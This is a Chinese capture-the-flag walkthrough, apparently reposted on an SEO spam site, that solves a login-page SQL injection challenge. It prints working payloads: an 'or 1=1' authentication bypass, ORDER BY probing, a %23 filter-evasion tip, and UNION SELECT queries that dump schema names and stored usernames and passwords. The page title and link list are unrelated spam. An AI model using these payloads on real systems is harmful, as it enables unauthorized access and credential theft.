当前位置: 首页 > news >正文

怎样用自己电脑做网站百度指数怎么分析

怎样用自己电脑做网站,百度指数怎么分析,wordpress图片排列显示,深圳坪山最新消息一、题目简介: 二、通关思路: 1、首先查看页面源代码: 我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。 2、 打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。 username: 1 or 11…

一、题目简介

二、通关思路

1、首先查看页面源代码:

我们发现可以使用工具sqlmap来拿到flag,我们先尝试手动注入。

2、 打开靶机,映入眼帘的是登录界面,首先尝试万能密码能否破解。

username: 1' or 1=1 #
password: 随便写任意值

提交submit,发现可以登录:

 并在 Your password 处发现一段乱码,疑似为flag,提交发现错误,这并不是flag,说明flag在别处。

3、通过万能密码已知,注入类型为 字符型,闭合方式为 单引号闭合,尝试查看字段数量。

当 order by 3 时,页面显示如图:

当 order by 4 时,页面显示如图:

Unknown column 4,说明页面报错了,说明字段数为3。

注:这里#使用URL编码格式:% + 十六进制数,目的是防止被过滤,在本题目中若使用 # 或 --+是无法检测出字段数量的,所以在以后的sql注入题目中,最好使用%23。

4、查看回显:

1' union select 1,2,3 %23

 

5、发现回显位 ,开始注出数据库库名,表名,列明,最终拿到flag。

注出库名:
1' union select 1,2,database() %23

 

注出表名:
1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database()) %23

 

注出列名:
1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='l0ve1ysq1') %23

 

 

拿到flag:
1' union select 1,2,(select group_concat(id,username,password) from l0ve1ysq1) %23

 

成功拿到flag,通关。

http://www.mmbaike.com/news/102658.html

相关文章:

  • 燕郊医院网站建设网站收录优化
  • 黄骅网站建设公司今日头条新闻10条简短
  • 两学一做党员答题网站网络推广引流是做什么的
  • 建站后角度是不是0百度seo关键词排名优化
  • 广州做网站建设的公司b2b采购平台
  • 济宁网站建设 帮站网络广告宣传怎么做
  • 兰州网站制作公司100小广告设计
  • 市场监督管理总局官网手机网站seo免费软件
  • 广州市网站建设科技免费发帖推广网站
  • 备案关闭网站建设影响处理事件seo软件
  • 南京雨花台区做网站成都专业的整站优化
  • 浙江住房和城乡建设部网站厦门关键词优化网站
  • 网站制作公司哪家专业佛山网站建设工作
  • 有关天猫网站开发的论文设计公司排名
  • 一级做受网站seo 优化一般包括哪些内容
  • 移动网站开发服务广告推广怎么做最有效
  • 网站建设需求策划书seo服务外包
  • 做网站好还是app好seo智能优化
  • 提供网站建设报百度一下首页下载安装桌面
  • 重庆网站建设公司是什么制作一个网站大概需要多少钱
  • 做网站卖广告多少钱百度提交网站的入口地址
  • 企业网站建设有什么要求西安百度竞价推广
  • 美国设计网站青岛seo排名收费
  • 网站建设方案总结广东疫情最新消息今天
  • 株洲发布信息网sem和seo哪个工作好
  • 帮赌博网站做推广被抓会判刑吗b2b平台免费推广网站
  • 影视网站建设百度青岛代理公司
  • 网站建设客户去哪里找百度seo优化公司
  • 做网站用什么主机好网站建设哪家公司好
  • 怎么在外国网站上找产品做跨境电商小程序开发哪家更靠谱